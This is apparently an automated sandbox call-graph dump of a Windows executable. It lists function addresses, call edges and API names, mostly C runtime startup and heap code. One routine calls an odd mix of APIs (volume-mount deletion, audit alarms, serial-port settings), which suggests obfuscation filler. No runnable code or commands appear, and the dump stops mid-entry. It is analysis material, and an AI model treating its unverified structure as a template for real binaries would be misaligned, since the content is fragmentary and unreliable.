401778 4050->4051 4051->4018 4051->4019 4053 4016ea 4052->4053 4054 4016ef 4052->4054 4152 402b77 4053->4152 4161 4029cc 4054->4161 4061 4036e7 4060->4061 4062 4036ed 4060->4062 4065 4013a4 __crt_waiting_on_module_handle 2 API calls 4061->4065 4063 403856 4062->4063 4064 4036f8 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4062->4064 4496 4033ed 4063->4496 4069 403741 TlsAlloc 4064->4069 4065->4062 4068 40178a 4068->4023 4068->4024 4069->4068 4070 40378f TlsSetValue 4069->4070 4070->4068 4071 4037a0 4070->4071 4485 40168e 4071->4485 4074 4032c3 __encode_pointer 6 API calls 4075 4037b0 4074->4075 4076 4032c3 __encode_pointer 6 API calls 4075->4076 4077 4037c0 4076->4077 4078 4032c3 __encode_pointer 6 API calls 4077->4078 4079 4037d0 4078->4079 4080 4032c3 __encode_pointer 6 API calls 4079->4080 4081 4037e0 4080->4081 4492 401b3b 4081->4492 4084 40333e __decode_pointer 6 API calls 4085 403801 4084->4085 4085->4063 4086 40488f __calloc_crt 67 API calls 4085->4086 4087 40381a 4086->4087 4087->4063 4088 40333e __decode_pointer 6 API calls 4087->4088 4089 403834 4088->4089 4089->4063 4090 40383b 4089->4090 4091 40342a __initptd 67 API calls 4090->4091 4092 403843 GetCurrentThreadId 4091->4092 4092->4068 4505 4027b0 4093->4505 4095 4044e3 GetStartupInfoA 4096 40488f __calloc_crt 67 API calls 4095->4096 4097 404504 4096->4097 4098 404722 __initptd 4097->4098 4099 404669 4097->4099 4101 40488f __calloc_crt 67 API calls 4097->4101 4107 4045ec 4097->4107 4098->4026 4099->4098 4100 40469f GetStdHandle 4099->4100 4102 404704 SetHandleCount 4099->4102 4103 4046b1 GetFileType 4099->4103 4105 4040a7 ___lock_fhandle InitializeCriticalSectionAndSpinCount 4099->4105 4100->4099 4101->4097 4102->4098 4103->4099 4104 404615 GetFileType 4104->4107 4105->4099 4106 4040a7 ___lock_fhandle InitializeCriticalSectionAndSpinCount 4106->4107 4107->4098 4107->4099 4107->4104 4107->4106 4109 402b77 __FF_MSGBANNER 67 API calls 4108->4109 4110 4013de 4109->4110 4111 4029cc __NMSG_WRITE 67 API calls 4110->4111 4112 4013e6 4111->4112 4113 40333e __decode_pointer 6 API calls 4112->4113 4114 4013f1 4113->4114 4114->4027 4116 40448b 4115->4116 4117 40448f 4115->4117 4116->4031 4118 40484a __malloc_crt 67 API calls 4117->4118 4120 4044b0 _realloc 4118->4120 4119 4044b7 FreeEnvironmentStringsW 4119->4031 4120->4119 4122 404401 _wparse_cmdline 4121->4122 4123 40484a __malloc_crt 67 API calls 4122->4123 4124 404444 _wparse_cmdline 4122->4124 4123->4124 4124->4033 4126 4041b5 _wcslen 4125->4126 4128 4017d9 4125->4128 4127 40488f __calloc_crt 67 API calls 4126->4127 4131 4041d9 _wcslen 4127->4131 4128->4038 4128->4040 4129 40423e 4130 403235 __fcloseall 67 API calls 4129->4130 4130->4128 4131->4128 4131->4129 4132 40488f __calloc_crt 67 API calls 4131->4132 4133 404264 4131->4133 4136 40386f __invoke_watson 10 API calls 4131->4136 4506 406161 4131->4506 4132->4131 4134 403235 __fcloseall 67 API calls 4133->4134 4134->4128 4136->4131 4139 4014a1 __IsNonwritableInCurrentImage 4137->4139 4515 403b47 4139->4515 4140 4014bf __initterm_e 4142 4014de __IsNonwritableInCurrentImage __initterm 4140->4142 4519 403ae4 4140->4519 4142->4041 4648 416ec0 4143->4648 4145 4172f5 4145->4045 5074 401518 4146->5074 4148 401655 4148->4046 4150 401518 _doexit 67 API calls 4149->4150 4151 40167b 4150->4151 4151->4049 4198 405173 4152->4198 4155 402b8b 4157 4029cc __NMSG_WRITE 67 API calls 4155->4157 4159 402bad 4155->4159 4156 405173 __set_error_mode 67 API calls 4156->4155 4158 402ba3 4157->4158 4160 4029cc __NMSG_WRITE 67 API calls 4158->4160 4159->4054 4160->4159 4162 4029e0 4161->4162 4163 405173 __set_error_mode 64 API calls 4162->4163 4194 4016f7 4162->4194 4164 402a02 4163->4164 4165 402b40 GetStdHandle 4164->4165 4167 405173 __set_error_mode 64 API calls 4164->4167 4166 402b4e _strlen 4165->4166 4165->4194 4170 402b67 WriteFile 4166->4170 4166->4194 4168 402a13 4167->4168 4168->4165 4169 402a25 4168->4169 4169->4194 4397 40510b 4169->4397 4170->4194 4173 402a5b GetModuleFileNameA 4175 402a79 4173->4175 4179 402a9c _strlen 4173->4179 4177 40510b _strcpy_s 64 API calls 4175->4177 4178 402a89 4177->4178 4178->4179 4181 40386f __invoke_watson 10 API calls 4178->4181 4180 402adf 4179->4180 4413 404fc8 4179->4413 4422 404f54 4180->4422 4181->4179 4186 402b03 4188 404f54 _strcat_s 64 API calls 4186->4188 4187 40386f __invoke_watson 10 API calls 4187->4186 4189 402b17 4188->4189 4191 402b28 4189->4191 4192 40386f __invoke_watson 10 API calls 4189->4192 4190 40386f __invoke_watson 10 API calls 4190->4180 4431 404deb 4191->4431 4192->4191 4195 401428 4194->4195 4482 4013fd GetModuleHandleW 4195->4482 4199 405182 4198->4199 4202 402b7e 4199->4202 4204 4019d4 4199->4204 4202->4155 4202->4156 4210 403511 GetLastError 4204->4210 4206 4019d9 4207 403997 4206->4207 4208 40333e __decode_pointer 6 API calls 4207->4208 4209 4039a7 __invoke_watson 4208->4209 4224 4033b9 TlsGetValue 4210->4224 4213 40357e SetLastError 4213->4206 4218 403575 4262 403235 4218->4262 4219 40355d 4244 40342a 4219->4244 4222 403565 GetCurrentThreadId 4222->4213 4223 40357b 4223->4213 4225 4033e9 4224->4225 4226 4033ce 4224->4226 4225->4213 4229 40488f 4225->4229 4227 40333e __decode_pointer 6 API calls 4226->4227 4228 4033d9 TlsSetValue 4227->4228 4228->4225 4232 404898 4229->4232 4231 40353c 4231->4213 4234 40333e TlsGetValue 4231->4234 4232->4231 4233 4048b6 Sleep 4232->4233 4275 401a1d 4232->4275 4233->4232 4235 403356 4234->4235 4236 403377 GetModuleHandleW 4234->4236 4235->4236 4239 403360 TlsGetValue 4235->4239 4237 403392 GetProcAddress 4236->4237 4238 403387 4236->4238 4242 40336f 4237->4242 4357 4013a4 4238->4357 4243 40336b 4239->4243 4242->4218 4242->4219 4243->4236 4243->4242 4361 4027b0 4244->4361 4246 403436 GetModuleHandleW 4247 403446 4246->4247 4248 40344c 4246->4248 4249 4013a4 __crt_waiting_on_module_handle 2 API calls 4247->4249 4250 403464 GetProcAddress GetProcAddress 4248->4250 4251 403488 4248->4251 4249->4248 4250->4251 4252 401cb7 __lock 63 API calls 4251->4252 4253 4034a7 InterlockedIncrement 4252->4253 4362 4034ff 4253->4362 4256 401cb7 __lock 63 API calls 4257 4034c8 4256->4257 4365 4059ea InterlockedIncrement 4257->4365 4259 4034e6 4377 403508 4259->4377 4261 4034f3 __initptd 4261->4222 4264 403241 __initptd 4262->4264 4263 4032ba __dosmaperr __initptd 4263->4223 4264->4263 4265 403280 4264->4265 4266 401cb7 __lock 65 API calls 4264->4266 4265->4263 4267 403295 HeapFree 4265->4267 4271 403258 ___sbh_find_block 4266->4271 4267->4263 4268 4032a7 4267->4268 4269 4019d4 __set_error_mode 65 API calls 4268->4269 4270 4032ac GetLastError 4269->4270 4270->4263 4274 403272 4271->4274 4382 401d1a 4271->4382 4389 40328b 4274->4389 4276 401a29 __initptd 4275->4276 4277 401a41 4276->4277 4287 401a60 _memset 4276->4287 4278 4019d4 __set_error_mode 66 API calls 4277->4278 4279 401a46 4278->4279 4280 403997 __set_error_mode 6 API calls 4279->4280 4282 401a56 __initptd 4280->4282 4281 401ad2 HeapAlloc 4281->4287 4282->4232 4287->4281 4287->4282 4288 401cb7 4287->4288 4295 4024c9 4287->4295 4301 401b19 4287->4301 4304 402bbf 4287->4304 4289 401ccc 4288->4289 4290 401cdf EnterCriticalSection 4288->4290 4307 401bf4 4289->4307 4290->4287 4292 401cd2 4292->4290 4293 4013d4 __amsg_exit 66 API calls 4292->4293 4294 401cde 4293->4294 4294->4290 4297 4024f7 4295->4297 4296 402590 4299 402599 4296->4299 4352 4020e0 4296->4352 4297->4296 4297->4299 4345 402030 4297->4345 4299->4287 4356 401bdd LeaveCriticalSection 4301->4356 4303 401b20 4303->4287 4305 40333e __decode_pointer 6 API calls 4304->4305 4306 402bcf 4305->4306 4306->4287 4308 401c00 __initptd 4307->4308 4309 401c26 4308->4309 4310 402b77 __FF_MSGBANNER 67 API calls 4308->4310 4317 401c36 __initptd 4309->4317 4333 40484a 4309->4333 4312 401c15 4310->4312 4314 4029cc __NMSG_WRITE 67 API calls 4312->4314 4318 401c1c 4314->4318 4315 401c57 4320 401cb7 __lock 67 API calls 4315->4320 4316 401c48 4319 4019d4 __set_error_mode 67 API calls 4316->4319 4317->4292 4321 401428 _fast_error_exit 3 API calls 4318->4321 4319->4317 4322 401c5e 4320->4322 4321->4309 4323 401c92 4322->4323 4324 401c66 4322->4324 4325 403235 __fcloseall 67 API calls 4323->4325 4338 4040a7 4324->4338 4328 401c83 4325->4328 4327 401c71 4327->4328 4330 403235 __fcloseall 67 API calls 4327->4330 4342 401cae 4328->4342 4331 401c7d 4330->4331 4332 4019d4 __set_error_mode 67 API calls 4331->4332 4332->4328 4337 404853 4333->4337 4334 40109e _malloc 66 API calls 4334->4337 4335 401c41 4335->4315 4335->4316 4336 40486a Sleep 4336->4337 4337->4334 4337->4335 4337->4336 4339 4027b0 __initptd 4338->4339 4340 4040b3 InitializeCriticalSectionAndSpinCount 4339->4340 4341 4040f7 __initptd 4340->4341 4341->4327 4343 401bdd _doexit LeaveCriticalSection 4342->4343 4344 401cb5 4343->4344 4344->4317 4346 402043 HeapReAlloc 4345->4346 4347 402077 HeapAlloc 4345->4347 4348 402061 4346->4348 4349 402065 4346->4349 4347->4348 4350 40209a VirtualAlloc 4347->4350 4348->4296 4349->4347 4350->4348 4351 4020b4 HeapFree 4350->4351 4351->4348 4353 4020f7 VirtualAlloc 4352->4353 4355 40213e 4353->4355 4355->4299 4356->4303 4358 4013af Sleep GetModuleHandleW 4357->4358 4359 4013d1 4358->4359 4360 4013cd 4358->4360 4359->4237 4359->4242 4360->4358 4360->4359 4361->4246 4380 401bdd LeaveCriticalSection 4362->4380 4364 4034c1 4364->4256 4366 405a08 InterlockedIncrement 4365->4366 4367 405a0b 4365->4367 4366->4367 4368 405a15 InterlockedIncrement 4367->4368 4369 405a18 4367->4369 4368->4369 4370 405a22 InterlockedIncrement 4369->4370 4371 405a25 4369->4371 4370->4371 4372 405a2f InterlockedIncrement 4371->4372 4374 405a32 4371->4374 4372->4374 4373 405a4b InterlockedIncrement 4373->4374 4374->4373 4375 405a5b InterlockedIncrement 4374->4375 4376 405a66 InterlockedIncrement 4374->4376 4375->4374 4376->4259 4381 401bdd LeaveCriticalSection 4377->4381 4379 40350f 4379->4261 4380->4364 4381->4379 4383 401d59 4382->4383 4388 401ffb 4382->4388 4384 401f45 VirtualFree 4383->4384 4383->4388 4385 401fa9 4384->4385 4386 401fb8 VirtualFree HeapFree 4385->4386 4385->4388 4392 404930 4386->4392 4388->4274 4396 401bdd LeaveCriticalSection 4389->4396 4391 403292 4391->4265 4393 404948 4392->4393 4394 404977 4393->4394 4395 40496f __VEC_memcpy 4393->4395 4394->4388 4395->4394 4396->4391 4398 405123 4397->4398 4399 40511c 4397->4399 4400 4019d4 __set_error_mode 67 API calls 4398->4400 4399->4398 4404 405149 4399->4404 4401 405128 4400->4401 4402 403997 __set_error_mode 6 API calls 4401->4402 4403 402a47 4402->4403 4403->4173 4406 40386f 4403->4406 4404->4403 4405 4019d4 __set_error_mode 67 API calls 4404->4405 4405->4401 4458 4047d0 4406->4458 4408 40389c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4409 403978 GetCurrentProcess TerminateProcess 4408->4409 4412 40396c __invoke_watson 4408->4412 4460 401000 4409->4460 4411 402a58 4411->4173 4412->4409 4414 404fda 4413->4414 4415 404fde 4414->4415 4416 402acc 4414->4416 4420 405024 4414->4420 4415->4416 4417 4019d4 __set_error_mode 67 API calls 4415->4417 4416->4180 4416->4190 4418 404ffa 4417->4418 4419 403997 __set_error_mode 6 API calls 4418->4419 4419->4416 4420->4416 4421 4019d4 __set_error_mode 67 API calls 4420->4421 4421->4418 4423 404f65 4422->4423 4424 404f6c 4422->4424 4423->4424 4428 404fa0 4423->4428 4425 4019d4 __set_error_mode 67 API calls 4424->4425 4430 404f71 4425->4430 4426 403997 __set_error_mode 6 API calls 4427 402af2 4426->4427 4427->4186 4427->4187 4428->4427 4429 4019d4 __set_error_mode 67 API calls 4428->4429 4429->4430 4430->4426 4469 403335 4431->4469 4434 404e96 4440 40333e __decode_pointer 6 API calls 4434->4440 4449 404ec0 4434->4449 4435 404e0e LoadLibraryA 4436 404e23 GetProcAddress 4435->4436 4437 404f38 4435->4437 4436->4437 4438 404e39 4436->4438 4437->4194 4472 4032c3 TlsGetValue 4438->4472 4439 40333e __decode_pointer 6 API calls 4451 404f03 4439->4451 4443 404eb3 4440->4443 4442 40333e __decode_pointer 6 API calls 4442->4437 4445 40333e __decode_pointer 6 API calls 4443->4445 4445->4449 4446 4032c3 __encode_pointer 6 API calls 4447 404e54 GetProcAddress 4446->4447 4448 4032c3 __encode_pointer 6 API calls 4447->4448 4450 404e69 GetProcAddress 4448->4450 4449->4439 4457 404eeb 4449->4457 4452 4032c3 __encode_pointer 6 API calls 4450->4452 4453 40333e __decode_pointer 6 API calls 4451->4453 4451->4457 4454 404e7e 4452->4454 4453->4457 4454->4434 4455 404e88 GetProcAddress 4454->4455 4456 4032c3 __encode_pointer 6 API calls 4455->4456 4456->4434 4457->4442 4459 4047dc __VEC_memzero 4458->4459 4459->4408 4461 401008 4460->4461 4462 40100a IsDebuggerPresent 4460->4462 4461->4411 4468 4047c1 4462->4468 4465 401959 SetUnhandledExceptionFilter UnhandledExceptionFilter 4466 401976 __invoke_watson 4465->4466 4467 40197e GetCurrentProcess TerminateProcess 4465->4467 4466->4467 4467->4411 4468->4465 4470 4032c3 __encode_pointer 6 API calls 4469->4470 4471 40333c 4470->4471 4471->4434 4471->4435 4473 4032db 4472->4473 4474 4032fc GetModuleHandleW 4472->4474 4473->4474 4477 4032e5 TlsGetValue 4473->4477 4475 403317 GetProcAddress 4474->4475 4476 40330c 4474->4476 4479 4032f4 GetProcAddress 4475->4479 4478 4013a4 __crt_waiting_on_module_handle 2 API calls 4476->4478 4481 4032f0 4477->4481 4480 403312 4478->4480 4479->4446 4480->4475 4480->4479 4481->4474 4481->4479 4483 401411 GetProcAddress 4482->4483 4484 401421 ExitProcess 4482->4484 4483->4484 4486 403335 _raise 6 API calls 4485->4486 4487 401696 __init_pointers __initp_misc_winsig 4486->4487 4502 403cf6 4487->4502 4490 4032c3 __encode_pointer 6 API calls 4491 4016d2 4490->4491 4491->4074 4493 401b46 4492->4493 4494 401b74 4493->4494 4495 4040a7 ___lock_fhandle InitializeCriticalSectionAndSpinCount 4493->4495 4494->4063 4494->4084 4495->4493 4497 4033f7 4496->4497 4501 403403 4496->4501 4498 40333e __decode_pointer 6 API calls 4497->4498 4498->4501 4499 403425 4499->4499 4500 403417 TlsFree 4500->4499 4501->4499 4501->4500 4503 4032c3 __encode_pointer 6 API calls 4502->4503 4504 4016c8 4503->4504 4504->4490 4505->4095 4507 406172 4506->4507 4509 406179 4506->4509 4507->4509 4513 4061a5 4507->4513 4508 4019d4 __set_error_mode 67 API calls 4510 40617e 4508->4510 4509->4508 4511 403997 __set_error_mode 6 API calls 4510->4511 4512 40618d 4511->4512 4512->4131 4513->4512 4514 4019d4 __set_error_mode 67 API calls 4513->4514 4514->4510 4516 403b4d 4515->4516 4517 4032c3 __encode_pointer 6 API calls 4516->4517 4518 403b65 4516->4518 4517->4516 4518->4140 4522 403aa8 4519->4522 4521 403af1 4521->4142 4523 403ab4 __initptd 4522->4523 4530 401440 4523->4530 4529 403ad5 __initptd 4529->4521 4531 401cb7 __lock 67 API calls 4530->4531 4532 401447 4531->4532 4533 4039bd 4532->4533 4534 40333e __decode_pointer 6 API calls 4533->4534 4535 4039d1 4534->4535 4536 40333e __decode_pointer 6 API calls 4535->4536 4537 4039e1 4536->4537 4538 403a64 4537->4538 4553 405f7e 4537->4553 4550 403ade 4538->4550 4540 403a4b 4541 4032c3 __encode_pointer 6 API calls 4540->4541 4542 403a59 4541->4542 4545 4032c3 __encode_pointer 6 API calls 4542->4545 4543 403a23 4543->4538 4547 4048db __realloc_crt 73 API calls 4543->4547 4548 403a39 4543->4548 4544 4039ff 4544->4540 4544->4543 4566 4048db 4544->4566 4545->4538 4547->4548 4548->4538 4549 4032c3 __encode_pointer 6 API calls 4548->4549 4549->4540 4644 401449 4550->4644 4554 405f8a __initptd 4553->4554 4555 405fb7 4554->4555 4556 405f9a 4554->4556 4558 405ff8 HeapSize 4555->4558 4560 401cb7 __lock 67 API calls 4555->4560 4557 4019d4 __set_error_mode 67 API calls 4556->4557 4559 405f9f 4557->4559 4562 405faf __initptd 4558->4562 4561 403997 __set_error_mode 6 API calls 4559->4561 4563 405fc7 ___sbh_find_block 4560->4563 4561->4562 4562->4544 4571 406018 4563->4571 4569 4048e4 4566->4569 4568 404923 4568->4543 4569->4568 4570 404904 Sleep 4569->4570 4575 401189 4569->4575 4570->4569 4574 401bdd LeaveCriticalSection 4571->4574 4573 405ff3 4573->4558 4573->4562 4574->4573 4576 401195 __initptd 4575->4576 4577 4011aa 4576->4577 4578 40119c 4576->4578 4580 4011b1 4577->4580 4581 4011bd 4577->4581 4611 40109e 4578->4611 4582 403235 __fcloseall 67 API calls 4580->4582 4588 40132f 4581->4588 4608 4011ca ___sbh_resize_block _realloc ___sbh_find_block 4581->4608 4597 4011a4 __dosmaperr __initptd 4582->4597 4583 401362 4584 402bbf _realloc 6 API calls 4583->4584 4587 401368 4584->4587 4585 401cb7 __lock 67 API calls 4585->4608 4586 401334 HeapReAlloc 4586->4588 4586->4597 4589 4019d4 __set_error_mode 67 API calls 4587->4589 4588->4583 4588->4586 4590 401386 4588->4590 4591 402bbf _realloc 6 API calls 4588->4591 4594 40137c 4588->4594 4589->4597 4592 4019d4 __set_error_mode 67 API calls 4590->4592 4590->4597 4591->4588 4595 40138f GetLastError 4592->4595 4596 4019d4 __set_error_mode 67 API calls 4594->4596 4595->4597 4599 4012fd 4596->4599 4597->4569 4598 401255 HeapAlloc 4598->4608 4599->4597 4601 401302 GetLastError 4599->4601 4600 4012aa HeapReAlloc 4600->4608 4601->4597 4602 4024c9 ___sbh_alloc_block 5 API calls 4602->4608 4603 401315 4603->4597 4605 4019d4 __set_error_mode 67 API calls 4603->4605 4604 402bbf _realloc 6 API calls 4604->4608 4606 401322 4605->4606 4606->4595 4606->4597 4607 4012f8 4609 4019d4 __set_error_mode 67 API calls 4607->4609 4608->4583 4608->4585 4608->4597 4608->4598 4608->4600 4608->4602 4608->4603 4608->4604 4608->4607 4610 401d1a VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 4608->4610 4628 4012cd 4608->4628 4609->4599 4610->4608 4612 401151 4611->4612 4621 4010b0 4611->4621 4613 402bbf _realloc 6 API calls 4612->4613 4614 401157 4613->4614 4616 4019d4 __set_error_mode 66 API calls 4614->4616 4615 402b77 __FF_MSGBANNER 66 API calls 4615->4621 4627 401149 4616->4627 4618 4029cc __NMSG_WRITE 66 API calls 4618->4621 4619 40110d HeapAlloc 4619->4621 4620 401428 _fast_error_exit 3 API calls 4620->4621 4621->4615 4621->4618 4621->4619 4621->4620 4622 40113d 4621->4622 4624 402bbf _realloc 6 API calls 4621->4624 4625 401142 4621->4625 4621->4627 4631 40104f 4621->4631 4623 4019d4 __set_error_mode 66 API calls 4622->4623 4623->4625 4624->4621 4626 4019d4 __set_error_mode 66 API calls 4625->4626 4626->4627 4627->4597 4643 401bdd LeaveCriticalSection 4628->4643 4630 4012d4 4630->4608 4632 40105b __initptd 4631->4632 4633 401cb7 __lock 67 API calls 4632->4633 4634 40108c __initptd 4632->4634 4635 401071 4633->4635 4634->4621 4636 4024c9 ___sbh_alloc_block 5 API calls 4635->4636 4637 40107c 4636->4637 4639 401095 4637->4639 4642 401bdd LeaveCriticalSection 4639->4642 4641 40109c 4641->4634 4642->4641 4643->4630 4647 401bdd LeaveCriticalSection 4644->4647 4646 401450 4646->4529 4647->4646 4649 416ecd __write_nolock 4648->4649 4650 416ef9 GetVolumeInformationA 4649->4650 4651 416f4a WriteConsoleOutputAttribute 4649->4651 4652 416f90 4649->4652 4650->4649 4651->4649 4653 416fb5 DeleteVolumeMountPointW 4652->4653 4654 416fc2 4652->4654 4653->4652 4655 416fcf InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode 4654->4655 4670 4170d6 4654->4670 4657 4047d0 _memset 4655->4657 4656 4170f0 SetCommState GetLastError 4658 417109 4656->4658 4656->4670 4659 417017 7 API calls 4657->4659 4660 4171c2 4658->4660 4661 417116 8 API calls 4658->4661 4662 4170c0 4659->4662 4663 4170b4 ObjectPrivilegeAuditAlarmA 4659->4663 4710 416ba0 LocalAlloc 4660->4710 4700 40100f 4661->4700 4664 4170d0 4662->4664 4665 4170c9 ReleaseMutex 4662->4665 4663->4662 4697 401168 4664->4697 4665->4664 4670->4656 4670->4658 4672 401189 _realloc 72 API calls 4674 41719a 4672->4674 4677 40109e _malloc 67 API calls 4674->4677 4676 4171c7 LoadLibraryW 4711 416bd0 GetModuleHandleW GetProcAddress 4676->4711 4678 4171a0 4677->4678 4680 40100f _calloc 67 API calls 4678->4680 4681 4171a7 4680->4681 4707 4072fe 4681->4707 4683 417239 LocalAlloc GetStdHandle MoveFileA 4685 417222 4683->4685 4685->4683 4687 417263 InterlockedDecrement 4685->4687 4689 417279 4685->4689 4686 40100f _calloc 67 API calls 4688 4171b3 4686->4688 4687->4685 4690 40109e _malloc 67 API calls 4688->4690 4691 4172a2 GetFileAttributesW 4689->4691 4694 4172ae 4689->4694 4692 4171b9 4690->4692 4691->4689 4693 401644 67 API calls 4692->4693 4693->4660 4695 401000 __putwch_nolock 5 API calls 4694->4695 4696 4172e1 4695->4696 4696->4145 4726 402e9d 4697->4726 4701 401a1d __calloc_impl 67 API calls 4700->4701 4702 401029 4701->4702 4703 401045 4702->4703 4704 4019d4 __set_error_mode 67 API calls 4702->4704 4703->4672 4705 40103c 4704->4705 4705->4703 4706 4019d4 __set_error_mode 67 API calls 4705->4706 4706->4703 5032 407224 4707->5032 4709 407305 4709->4686 4710->4676 4712 416d0d 4711->4712 4713 416e20 4712->4713 4714 416e49 QueryDosDeviceA 4713->4714 4715 416e5a 4713->4715 4714->4715 5060 416d70 4715->5060 4718 416e75 5063 416db0 4718->5063 4719 416e6d FreeEnvironmentStringsW 4719->4718 4722 416ea3 4724 401000 __putwch_nolock 5 API calls 4722->4724 4723 416e8c HeapDestroy GetNumaProcessorNode 4723->4722 4725 416ead 4724->4725 4725->4685 4727 402eb6 4726->4727 4730 402c6e 4727->4730 4742 402be7 4730->4742 4732 402c95 4733 4019d4 __set_error_mode 67 API calls 4732->4733 4735 402c9a 4733->4735 4736 403997 __set_error_mode 6 API calls 4735->4736 4739 401179 4736->4739 4738 402cd2 4740 402d17 4738->4740 4750 405bc6 4738->4750 4739->4670 4740->4739 4741 4019d4 __set_error_mode 67 API calls 4740->4741 4741->4739 4743 402bfa 4742->4743 4747 402c47 4742->4747 4757 40358a 4743->4757 4746 402c27 4746->4747 4777 4053e4 4746->4777 4747->4732 4747->4738 4751 402be7 _LocaleUpdate::_LocaleUpdate 77 API calls 4750->4751 4752 405bda 4751->4752 4756 405be7 4752->4756 4965 406d80 4752->4965 4756->4738 4758 403511 __getptd_noexit 67 API calls 4757->4758 4759 403592 4758->4759 4760 4013d4 __amsg_exit 67 API calls 4759->4760 4761 402bff 4759->4761 4760->4761 4761->4746 4762 405b50 4761->4762 4763 405b5c __initptd 4762->4763 4764 40358a __getptd 67 API calls 4763->4764 4765 405b61 4764->4765 4766 405b8f 4765->4766 4768 405b73 4765->4768 4767 401cb7 __lock 67 API calls 4766->4767 4769 405b96 4767->4769 4770 40358a __getptd 67 API calls 4768->4770 4793 405b12 4769->4793 4772 405b78 4770->4772 4775 405b86 __initptd 4772->4775 4776 4013d4 __amsg_exit 67 API calls 4772->4776 4775->4746 4776->4775 4778 4053f0 __initptd 4777->4778 4779 40358a __getptd 67 API calls 4778->4779 4780 4053f5 4779->4780 4781 401cb7 __lock 67 API calls 4780->4781 4782 405407 4780->4782 4784 405425 4781->4784 4783 405415 __initptd 4782->4783 4786 4013d4 __amsg_exit 67 API calls 4782->4786 4783->4747 4785 40546e 4784->4785 4788 405456 InterlockedIncrement 4784->4788 4789 40543c InterlockedDecrement 4784->4789 4961 40547f 4785->4961 4786->4783 4788->4785 4789->4788 4790 405447 4789->4790 4790->4788 4791 403235 __fcloseall 67 API calls 4790->4791 4792 405455 4791->4792 4792->4788 4794 405b16 4793->4794 4795 405b48 4793->4795 4794->4795 4796 4059ea ___addlocaleref 8 API calls 4794->4796 4801 405bba 4795->4801 4797 405b29 4796->4797 4797->4795 4804 405a79 4797->4804 4960 401bdd LeaveCriticalSection 4801->4960 4803 405bc1 4803->4772 4805 405a8a InterlockedDecrement 4804->4805 4806 405b0d 4804->4806 4807 405aa2 4805->4807 4808 405a9f InterlockedDecrement 4805->4808 4806->4795 4818 4058a1 4806->4818 4809 405aac InterlockedDecrement 4807->4809 4810 405aaf 4807->4810 4808->4807 4809->4810 4811 405ab9 InterlockedDecrement 4810->4811 4812 405abc 4810->4812 4811->4812 4813 405ac6 InterlockedDecrement 4812->4813 4815 405ac9 4812->4815 4813->4815 4814 405ae2 InterlockedDecrement 4814->4815 4815->4814 4816 405afd InterlockedDecrement 4815->4816 4817 405af2 InterlockedDecrement 4815->4817 4816->4806 4817->4815 4819 4058b8 4818->4819 4820 405925 4818->4820 4819->4820 4823 4058ec 4819->4823 4831 403235 __fcloseall 67 API calls 4819->4831 4821 405972 4820->4821 4822 403235 __fcloseall 67 API calls 4820->4822 4833 405999 4821->4833 4872 4069ed 4821->4872 4825 405946 4822->4825 4827 40590d 4823->4827 4838 403235 __fcloseall 67 API calls 4823->4838 4828 403235 __fcloseall 67 API calls 4825->4828 4829 403235 __fcloseall 67 API calls 4827->4829 4834 405959 4828->4834 4835 40591a 4829->4835 4830 4059de 4836 403235 __fcloseall 67 API calls 4830->4836 4837 4058e1 4831->4837 4832 403235 __fcloseall 67 API calls 4832->4833 4833->4830 4842 403235 67 API calls __fcloseall 4833->4842 4839 403235 __fcloseall 67 API calls 4834->4839 4843 403235 __fcloseall 67 API calls 4835->4843 4844 4059e4 4836->4844 4848 406bc7 4837->4848 4840 405902 4838->4840 4841 405967 4839->4841 4864 406b82 4840->4864 4847 403235 __fcloseall 67 API calls 4841->4847 4842->4833 4843->4820 4844->4795 4847->4821 4849 406c51 4848->4849 4850 406bd4 4848->4850 4849->4823 4851 406be5 4850->4851 4852 403235 __fcloseall 67 API calls 4850->4852 4853 406bf7 4851->4853 4854 403235 __fcloseall 67 API calls 4851->4854 4852->4851 4855 406c09 4853->4855 4856 403235 __fcloseall 67 API calls 4853->4856 4854->4853 4857 406c1b 4855->4857 4858 403235 __fcloseall 67 API calls 4855->4858 4856->4855 4859 406c2d 4857->4859 4860 403235 __fcloseall 67 API calls 4857->4860 4858->4857 4861 406c3f 4859->4861 4862 403235 __fcloseall 67 API calls 4859->4862 4860->4859 4861->4849 4863 403235 __fcloseall 67 API calls 4861->4863 4862->4861 4863->4849 4865 406bc3 4864->4865 4866 406b8f 4864->4866 4865->4827 4867 406b9f 4866->4867 4868 403235 __fcloseall 67 API calls 4866->4868 4869 406bb1 4867->4869 4870 403235 __fcloseall 67 API calls 4867->4870 4868->4867 4869->4865 4871 403235 __fcloseall 67 API calls 4869->4871 4870->4869 4871->4865 4873 4069fe 4872->4873 4874 405992 4872->4874 4875 403235 __fcloseall 67 API calls 4873->4875 4874->4832 4876 406a06 4875->4876 4877 403235 __fcloseall 67 API calls 4876->4877 4878 406a0e 4877->4878 4879 403235 __fcloseall 67 API calls 4878->4879 4880 406a16 4879->4880 4881 403235 __fcloseall 67 API calls 4880->4881 4882 406a1e 4881->4882 4883 403235 __fcloseall 67 API calls 4882->4883 4884 406a26 4883->4884 4885 403235 __fcloseall 67 API calls 4884->4885 4886 406a2e 4885->4886 4887 403235 __fcloseall 67 API calls 4886->4887 4888 406a35 4887->4888 4889 403235 __fcloseall 67 API calls 4888->4889 4890 406a3d 4889->4890 4891 403235 __fcloseall 67 API calls 4890->4891 4892 406a45 4891->4892 4893 403235 __fcloseall 67 API calls 4892->4893 4894 406a4d 4893->4894 4895 403235 __fcloseall 67 API calls 4894->4895 4896 406a55 4895->4896 4897 403235 __fcloseall 67 API calls 4896->4897 4898 406a5d 4897->4898 4899 403235 __fcloseall 67 API calls 4898->4899 4900 406a65 4899->4900 4901 403235 __fcloseall 67 API calls 4900->4901 4902 406a6d 4901->4902 4903 403235 __fcloseall 67 API calls 4902->4903 4904 406a75 4903->4904 4905 403235 __fcloseall 67 API calls 4904->4905 4906 406a7d 4905->4906 4907 403235 __fcloseall 67 API calls 4906->4907 4908 406a88 4907->4908 4909 403235 __fcloseall 67 API calls 4908->4909 4910 406a90 4909->4910 4911 403235 __fcloseall 67 API calls 4910->4911 4912 406a98 4911->4912 4913 403235 __fcloseall 67 API calls 4912->4913 4914 406aa0 4913->4914 4915 403235 __fcloseall 67 API calls 4914->4915 4916 406aa8 4915->4916 4917 403235 __fcloseall 67 API calls 4916->4917 4918 406ab0 4917->4918 4919 403235 __fcloseall 67 API calls 4918->4919 4920 406ab8 4919->4920 4921 403235 __fcloseall 67 API 